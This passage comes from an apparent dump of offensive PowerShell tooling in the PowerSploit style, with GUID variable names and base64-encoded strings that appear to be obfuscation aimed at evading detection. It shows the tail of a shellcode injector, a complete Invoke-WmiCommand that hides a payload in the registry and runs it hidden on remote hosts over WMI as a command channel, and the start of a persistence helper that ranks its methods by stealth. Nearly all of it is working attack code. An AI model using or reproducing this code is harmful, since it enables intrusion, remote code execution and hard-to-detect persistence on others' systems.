shellcode into PID: ${a1c827e2c0ed4a4889805491350137e2}" 372 | if ( ${bab5df81ac5040dbbbb4c01205f3b8e4} -or $psCmdlet.ShouldContinue( $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvACAAeQBvAHUAIAB3AGkAcwBoACAAdABvACAAYwBhAHIAcgB5ACAAbwB1AHQAIAB5AG8AdQByACAAZQB2AGkAbAAgAHAAbABhAG4AcwA/AA=='))), 373 | "Injecting shellcode injecting into $((ps -Id ${a1c827e2c0ed4a4889805491350137e2}).ProcessName) (${a1c827e2c0ed4a4889805491350137e2})!" ) ) 374 | { 375 | Inject-RemoteShellcode ${a1c827e2c0ed4a4889805491350137e2} 376 | } 377 | } 378 | else 379 | { 380 | ${eb694d8cd52a4868803f3b0f11bd411f} = Get-ProcAddress kernel32.dll VirtualAlloc 381 | ${f45d43d878b244adacf5eac2265ea365} = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) 382 | ${eb933ced95a944428b16abca963b8087} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${eb694d8cd52a4868803f3b0f11bd411f}, ${f45d43d878b244adacf5eac2265ea365}) 383 | ${d6a315bed6d84ae7b7127a9e88ec114f} = Get-ProcAddress kernel32.dll VirtualFree 384 | ${e5e8edb5b698425e95d7de05811cb49c} = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool]) 385 | ${711707a94e3e4d0cb26eba626fed37bc} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${d6a315bed6d84ae7b7127a9e88ec114f}, ${e5e8edb5b698425e95d7de05811cb49c}) 386 | ${4c452a9edce440a28d28cde08bb61173} = Get-ProcAddress kernel32.dll CreateThread 387 | ${58b0c7ec8c4c4c4fb9de23fbba5b819e} = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) 388 | ${56bc5f168ce04046907a2bb4ffc2497f} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${4c452a9edce440a28d28cde08bb61173}, ${58b0c7ec8c4c4c4fb9de23fbba5b819e}) 389 | ${8c1dba931bbd41e6b828883396d210f4} = Get-ProcAddress kernel32.dll WaitForSingleObject 390 | ${02cc210f6b534ce4acb4e04fba7d503a} = Get-DelegateType @([IntPtr], [Int32]) ([Int]) 391 | ${590b2e0764d34d65ba757e59bd6b00b4} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${8c1dba931bbd41e6b828883396d210f4}, ${02cc210f6b534ce4acb4e04fba7d503a}) 392 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABzAGgAZQBsAGwAYwBvAGQAZQAgAGkAbgB0AG8AIABQAG8AdwBlAHIAUwBoAGUAbABsAA=='))) 393 | if ( ${bab5df81ac5040dbbbb4c01205f3b8e4} -or $psCmdlet.ShouldContinue( $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvACAAeQBvAHUAIAB3AGkAcwBoACAAdABvACAAYwBhAHIAcgB5ACAAbwB1AHQAIAB5AG8AdQByACAAZQB2AGkAbAAgAHAAbABhAG4AcwA/AA=='))), 394 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABzAGgAZQBsAGwAYwBvAGQAZQAgAGkAbgB0AG8AIAB0AGgAZQAgAHIAdQBuAG4AaQBuAGcAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AYwBlAHMAcwAhAA=='))) ) ) 395 | { 396 | Inject-LocalShellcode 397 | } 398 | } 399 | } 400 | -------------------------------------------------------------------------------- /Invoke-WmiCommand.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-WmiCommand { 2 | <# 3 | .SYNOPSIS 4 | 5 | Executes a PowerShell ScriptBlock on a target computer using WMI as a 6 | pure C2 channel. 7 | 8 | Author: Matthew Graeber 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | 13 | .DESCRIPTION 14 | 15 | Invoke-WmiCommand executes a PowerShell ScriptBlock on a target 16 | computer using WMI as a pure C2 channel. It does this by using the 17 | StdRegProv WMI registry provider methods to store a payload into a 18 | registry value. The command is then executed on the victim system and 19 | the output is stored in another registry value that is then retrieved 20 | remotely. 21 | 22 | .PARAMETER Payload 23 | 24 | Specifies the payload to be executed on the remote system. 25 | 26 | .PARAMETER RegistryKeyPath 27 | 28 | Specifies the registry key where the payload and payload output will 29 | be stored. 30 | 31 | .PARAMETER RegistryPayloadValueName 32 | 33 | Specifies the registry value name where the payload will be stored. 34 | 35 | .PARAMETER RegistryResultValueName 36 | 37 | Specifies the registry value name where the payload output will be 38 | stored. 39 | 40 | .PARAMETER ComputerName 41 | 42 | Runs the command on the specified computers. The default is the local 43 | computer. 44 | 45 | Type the NetBIOS name, an IP address, or a fully qualified domain 46 | name of one or more computers. To specify the local computer, type 47 | the computer name, a dot (.), or "localhost". 48 | 49 | This parameter does not rely on Windows PowerShell remoting. You can 50 | use the ComputerName parameter even if your computer is not 51 | configured to run remote commands. 52 | 53 | .PARAMETER Credential 54 | 55 | Specifies a user account that has permission to perform this action. 56 | The default is the current user. Type a user name, such as "User01", 57 | "Domain01\User01", or User@Contoso.com. Or, enter a PSCredential 58 | object, such as an object that is returned by the Get-Credential 59 | cmdlet. When you type a user name, you will be prompted for a 60 | password. 61 | 62 | .PARAMETER Impersonation 63 | 64 | Specifies the impersonation level to use. Valid values are: 65 | 66 | 0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".) 67 | 68 | 1: Anonymous (Hides the credentials of the caller.) 69 | 70 | 2: Identify (Allows objects to query the credentials of the caller.) 71 | 72 | 3: Impersonate (Allows objects to use the credentials of the caller.) 73 | 74 | 4: Delegate (Allows objects to permit other objects to use the credentials of the caller.) 75 | 76 | .PARAMETER Authentication 77 | 78 | Specifies the authentication level to be used with the WMI connection. Valid values are: 79 | 80 | -1: Unchanged 81 | 82 | 0: Default 83 | 84 | 1: None (No authentication in performed.) 85 | 86 | 2: Connect (Authentication is performed only when the client establishes a relationship with the application.) 87 | 88 | 3: Call (Authentication is performed only at the beginning of each call when the application receives the request.) 89 | 90 | 4: Packet (Authentication is performed on all the data that is received from the client.) 91 | 92 | 5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.) 93 | 94 | 6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.) 95 | 96 | .PARAMETER EnableAllPrivileges 97 | 98 | Enables all the privileges of the current user before the command 99 | makes the WMI call. 100 | 101 | .PARAMETER Authority 102 | 103 | Specifies the authority to use to authenticate the WMI connection. 104 | You can specify standard NTLM or Kerberos authentication. To use 105 | NTLM, set the authority setting to ntlmdomain:, where 106 | identifies a valid NTLM domain name. To use Kerberos, 107 | specify kerberos:. You cannot include the 108 | authority setting when you connect to the local computer. 109 | 110 | .EXAMPLE 111 | 112 | PS C:\>Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1' 113 | 114 | .EXAMPLE 115 | 116 | PS C:\>$Hosts = Get-Content hostnames.txt 117 | PS C:\>$Payload = Get-Content payload.ps1 118 | PS C:\>$Credential = Get-Credential 'TargetDomain\TargetUser' 119 | PS C:\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential 120 | 121 | .EXAMPLE 122 | 123 | PS C:\>$Payload = Get-Content payload.ps1 124 | PS C:\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2' 125 | 126 | .EXAMPLE 127 | 128 | PS C:/>Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose 129 | 130 | .INPUTS 131 | 132 | System.String[] 133 | 134 | Accepts one or more host names/IP addresses over the pipeline. 135 | 136 | .OUTPUTS 137 | 138 | System.Management.Automation.PSObject 139 | 140 | Outputs a custom object consisting of the target computer name and 141 | the output of the command executed. 142 | 143 | .NOTES 144 | 145 | In order to receive the output from your payload, it must return 146 | actual objects. For example, Write-Host doesn't return objects 147 | rather, it writes directly to the console. If you're using 148 | Write-Host in your scripts though, you probably don't deserve to get 149 | the output of your payload back. :P 150 | #> 151 | [CmdletBinding()] 152 | Param ( 153 | [Parameter( Mandatory = $True )] 154 | [ScriptBlock] 155 | ${b829d8b4107f434489f2a24e98166fab}, 156 | [String] 157 | [ValidateSet( 'HKEY_LOCAL_MACHINE', 158 | 'HKEY_CURRENT_USER', 159 | 'HKEY_CLASSES_ROOT', 160 | 'HKEY_USERS', 161 | 'HKEY_CURRENT_CONFIG' )] 162 | ${ee57e92372e34252addbc38755677dc9} = 'HKEY_CURRENT_USER', 163 | [String] 164 | [ValidateNotNullOrEmpty()] 165 | ${b8a5821b9cde4d56954db60d168ccd81} = 'SOFTWARE\Microsoft\Cryptography\RNG', 166 | [String] 167 | [ValidateNotNullOrEmpty()] 168 | ${c9f7dd28a10745b8a1a5785bc1317b82} = 'Seed', 169 | [String] 170 | [ValidateNotNullOrEmpty()] 171 | ${a03b076451d54aaea1ec6e9ced35d761} = 'Value', 172 | [Parameter( ValueFromPipeline = $True )] 173 | [Alias('Cn')] 174 | [String[]] 175 | [ValidateNotNullOrEmpty()] 176 | ${ba926e6e7cc04ac5bf9e8c1ee609261e} = 'localhost', 177 | [Management.Automation.PSCredential] 178 | [Management.Automation.CredentialAttribute()] 179 | ${c067abdf1bfb4621b133d399cd264630} = [Management.Automation.PSCredential]::Empty, 180 | [Management.ImpersonationLevel] 181 | ${b2989c629f4c41fbb00f7035b2d94a16}, 182 | [System.Management.AuthenticationLevel] 183 | ${a6bacf4b8368429992f3730d67f0ed9d}, 184 | [Switch] 185 | ${c40c652725c64295b000687f5ca244ce}, 186 | [String] 187 | ${aa41c72ec3fb44dab2fad3e4f3c1306d} 188 | ) 189 | BEGIN { 190 | switch (${ee57e92372e34252addbc38755677dc9}) { 191 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUA'))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483650 } 192 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAA=='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483649 } 193 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAA=='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483648 } 194 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAFUAUwBFAFIAUwA='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483651 } 195 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBDAE8ATgBGAEkARwA='))) { ${7f8c6bf1e0474106952c6799cf745270} = 2147483653 } 196 | } 197 | ${2a8ed39a52f4476595a097347215a204} = 2147483650 198 | ${457de8c0b140457c862387582cb1823c} = @{} 199 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAZABlAG4AdABpAGEAbAA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAZABlAG4AdABpAGEAbAA=')))] = ${c067abdf1bfb4621b133d399cd264630} } 200 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgA=')))] = ${b2989c629f4c41fbb00f7035b2d94a16} } 201 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAA==')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAA==')))] = ${a6bacf4b8368429992f3730d67f0ed9d} } 202 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwA=')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwA=')))] = ${c40c652725c64295b000687f5ca244ce} } 203 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABvAHIAaQB0AHkA')))]) { ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABvAHIAaQB0AHkA')))] = ${aa41c72ec3fb44dab2fad3e4f3c1306d} } 204 | ${60b69a64f1bf4c349d8ea98f30ee648c} = @{ 205 | KEY_QUERY_VALUE = 1 206 | KEY_SET_VALUE = 2 207 | KEY_CREATE_SUB_KEY = 4 208 | KEY_CREATE = 32 209 | DELETE = 65536 210 | } 211 | ${779eed4e673b417abfb01cb41cf5cd08} = ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBRAFUARQBSAFkAXwBWAEEATABVAEUA')))] -bor 212 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBTAEUAVABfAFYAQQBMAFUARQA=')))] -bor 213 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBDAFIARQBBAFQARQBfAFMAVQBCAF8ASwBFAFkA')))] -bor 214 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBFAFkAXwBDAFIARQBBAFQARQA=')))] -bor 215 | ${60b69a64f1bf4c349d8ea98f30ee648c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABFAEwARQBUAEUA')))] 216 | } 217 | PROCESS { 218 | foreach ($Computer in ${ba926e6e7cc04ac5bf9e8c1ee609261e}) { 219 | ${457de8c0b140457c862387582cb1823c}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG0AcAB1AHQAZQByAE4AYQBtAGUA')))] = $Computer 220 | Write-Verbose "[$Computer] Creating the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 221 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUASwBlAHkA'))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81} 222 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 223 | throw "[$Computer] Unable to create the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 224 | } 225 | Write-Verbose "[$Computer] Validating read/write/delete privileges for the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 226 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAEEAYwBjAGUAcwBzAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${779eed4e673b417abfb01cb41cf5cd08} 227 | if (-not ${279cb454c2e443a9a14d056e1ff41a4d}.bGranted) { 228 | throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand." 229 | } 230 | ${8906be79882545ac9180ca3445bade56} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFMAaABlAGwAbABJAGQAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4AUABvAHcAZQByAFMAaABlAGwAbAA='))) 231 | ${0168d713deb74d75b3f1f71b4f872e7e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABhAHQAaAA='))) 232 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${2a8ed39a52f4476595a097347215a204}, ${8906be79882545ac9180ca3445bade56}, ${0168d713deb74d75b3f1f71b4f872e7e} 233 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 234 | throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\${8906be79882545ac9180ca3445bade56}\${0168d713deb74d75b3f1f71b4f872e7e}" 235 | } 236 | ${6708990988854da996f0047df54da77e} = ${279cb454c2e443a9a14d056e1ff41a4d}.sValue 237 | Write-Verbose "[$Computer] Full PowerShell path: ${6708990988854da996f0047df54da77e}" 238 | ${27f99395791c4ee2b7b06ba2cfa73dea} = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(${b829d8b4107f434489f2a24e98166fab})) 239 | Write-Verbose "[$Computer] Storing the payload into the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 240 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${27f99395791c4ee2b7b06ba2cfa73dea}, ${c9f7dd28a10745b8a1a5785bc1317b82} 241 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 242 | throw "[$Computer] Unable to store the payload in the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 243 | } 244 | ${7d69ebf6d4df4bba851f27cd3ce3c25a} = @" 245 | `$Hive = '${7f8c6bf1e0474106952c6799cf745270}' 246 | `$RegistryKeyPath = '${b8a5821b9cde4d56954db60d168ccd81}' 247 | `$RegistryPayloadValueName = '${c9f7dd28a10745b8a1a5785bc1317b82}' 248 | `$RegistryResultValueName = '${a03b076451d54aaea1ec6e9ced35d761}' 249 | `n 250 | "@ 251 | ${8ddd5d4bd3514330b637ceece32df4bf} = ${7d69ebf6d4df4bba851f27cd3ce3c25a} + { 252 | ${457de8c0b140457c862387582cb1823c} = @{ 253 | Namespace = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) 254 | Class = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) 255 | } 256 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${c9f7dd28a10745b8a1a5785bc1317b82} 257 | if ((${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -eq 0) -and (${279cb454c2e443a9a14d056e1ff41a4d}.sValue)) { 258 | ${b829d8b4107f434489f2a24e98166fab} = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(${279cb454c2e443a9a14d056e1ff41a4d}.sValue)) 259 | ${6b4ded6aa38b4a4ab19f37298f8181f6} = [IO.Path]::GetTempFileName() 260 | ${8b6291881c2640e9992b5bf7e1fd3a5c} = iex (${b829d8b4107f434489f2a24e98166fab}) 261 | Export-Clixml -InputObject ${8b6291881c2640e9992b5bf7e1fd3a5c} -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 262 | ${96fe6c08ff7247f79437340dd1052864} = [IO.File]::ReadAllText(${6b4ded6aa38b4a4ab19f37298f8181f6}) 263 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${96fe6c08ff7247f79437340dd1052864}, ${a03b076451d54aaea1ec6e9ced35d761} 264 | rd -Path ${d179441aac564156b181a4f2548622c0} -Force 265 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${c9f7dd28a10745b8a1a5785bc1317b82} 266 | } 267 | } 268 | ${16d25a427e11479caec293ff490244a4} = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(${8ddd5d4bd3514330b637ceece32df4bf})) 269 | ${a52ada24d02b4e228879fc0725ebc3a4} = "${6708990988854da996f0047df54da77e} -WindowStyle Hidden -NoProfile -EncodedCommand ${16d25a427e11479caec293ff490244a4}" 270 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGMAaQBtAHYAMgA='))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUA'))) -ArgumentList ${a52ada24d02b4e228879fc0725ebc3a4} 271 | sleep -Seconds 5 272 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 273 | throw "[$Computer] Unable to execute payload stored within the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 274 | } 275 | Write-Verbose "[$Computer] Payload successfully executed from: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${c9f7dd28a10745b8a1a5785bc1317b82}" 276 | ${279cb454c2e443a9a14d056e1ff41a4d} = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUwB0AHIAaQBuAGcAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${a03b076451d54aaea1ec6e9ced35d761} 277 | if (${279cb454c2e443a9a14d056e1ff41a4d}.ReturnValue -ne 0) { 278 | throw "[$Computer] Unable retrieve the payload results from the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 279 | } 280 | Write-Verbose "[$Computer] Payload results successfully retrieved from: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 281 | ${d179441aac564156b181a4f2548622c0} = ${279cb454c2e443a9a14d056e1ff41a4d}.sValue 282 | ${6b4ded6aa38b4a4ab19f37298f8181f6} = [IO.Path]::GetTempFileName() 283 | Out-File -InputObject ${d179441aac564156b181a4f2548622c0} -FilePath ${6b4ded6aa38b4a4ab19f37298f8181f6} 284 | ${8b6291881c2640e9992b5bf7e1fd3a5c} = Import-Clixml -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 285 | rd -Path ${6b4ded6aa38b4a4ab19f37298f8181f6} 286 | ${b2918fca85814af08ebac572c21baa93} = New-Object PSObject -Property @{ 287 | PSComputerName = $Computer 288 | PayloadOutput = ${8b6291881c2640e9992b5bf7e1fd3a5c} 289 | } 290 | Write-Verbose "[$Computer] Removing the following registry value: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}\${a03b076451d54aaea1ec6e9ced35d761}" 291 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUAVgBhAGwAdQBlAA=='))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81}, ${a03b076451d54aaea1ec6e9ced35d761} 292 | Write-Verbose "[$Computer] Removing the following registry key: ${ee57e92372e34252addbc38755677dc9}\${b8a5821b9cde4d56954db60d168ccd81}" 293 | $null = Invoke-WmiMethod @457de8c0b140457c862387582cb1823c -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBvAG8AdABcAGQAZQBmAGEAdQBsAHQA'))) -Class $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGQAUgBlAGcAUAByAG8AdgA='))) -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQB0AGUASwBlAHkA'))) -ArgumentList ${7f8c6bf1e0474106952c6799cf745270}, ${b8a5821b9cde4d56954db60d168ccd81} 294 | return ${b2918fca85814af08ebac572c21baa93} 295 | } 296 | } 297 | } 298 | -------------------------------------------------------------------------------- /Persistence.ps1: -------------------------------------------------------------------------------- 1 | function New-ElevatedPersistenceOption 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Configure elevated persistence options for the Add-Persistence function. 7 | 8 | PowerSploit Function: New-ElevatedPersistenceOption 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. 17 | 18 | .PARAMETER PermanentWMI 19 | 20 | Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. 21 | 22 | Detection Difficulty: Difficult 23 | Removal Difficulty: Difficult 24 | User Detectable? No 25 | 26 | .PARAMETER ScheduledTask 27 | 28 | Persist via a scheduled task. 29 | 30 | Detection Difficulty: Moderate 31 | Removal Difficulty: Moderate 32 | User Detectable? No 33 | 34 | .PARAMETER Registry 35 | 36 | Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. 37 | 38 | Detection Difficulty: Easy 39 | Removal Difficulty: Easy 40 | User Detectable? Yes 41 | 42 | .PARAMETER AtLogon 43 | 44 | Starts the payload upon any user logon. 45 | 46 | 